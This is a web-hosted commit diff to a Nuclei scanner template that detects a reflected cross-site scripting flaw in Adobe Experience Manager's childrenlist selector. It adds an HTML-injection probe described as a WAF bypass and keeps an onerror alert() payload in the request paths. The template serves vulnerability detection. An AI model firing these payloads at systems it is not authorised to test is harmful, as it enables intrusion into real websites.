daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

added waf bypass html payload

patch-1
Ritik Chaddha 2023-01-16 13:37:20 +05:30 committed by GitHub
parent 33266ab033
commit f38ee97a34
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 10 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
misconfiguration/aem/aem-childrenlist-xss.yaml
View File

@ -1,7 +1,7 @@
id: aem-xss-childlist id: aem-xss-childlist
info: info:
name: Adobe Experience Manager - Childlist selector Cross-Site Scripting name: Adobe Experience Manager 'Childlist selector' - Cross-Site Scripting
author: theabhinavgaur author: theabhinavgaur
severity: medium severity: medium
description: | description: |
@ -17,7 +17,8 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/{{rand_base(4)}}{{rand_base(5)}}<img src=x data'a'onerror=alert(domain)>.childrenlist.html" - "{{BaseURL}}/test<br><br>please%20authenticate<br><br>.childrenlist.html"
- "{{BaseURL}}/test<img src=x data'a'onerror=alert(domain)>.childrenlist.html"
matchers-condition: and matchers-condition: and
matchers: matchers:
@ -25,8 +26,13 @@ requests:
part: body part: body
words: words:
- '<img src="x" data onerror="alert(domain)"/>' - '<img src="x" data onerror="alert(domain)"/>'
- '<br /><br />please authenticate<br /><br />'
condition: or
- type: word
part: body
words:
- 'data-coral-columnview-id' - 'data-coral-columnview-id'
condition: and
- type: word - type: word
part: content_type part: content_type
@ -35,4 +41,4 @@ requests:
- type: status - type: status
status: status:
- 200 - 200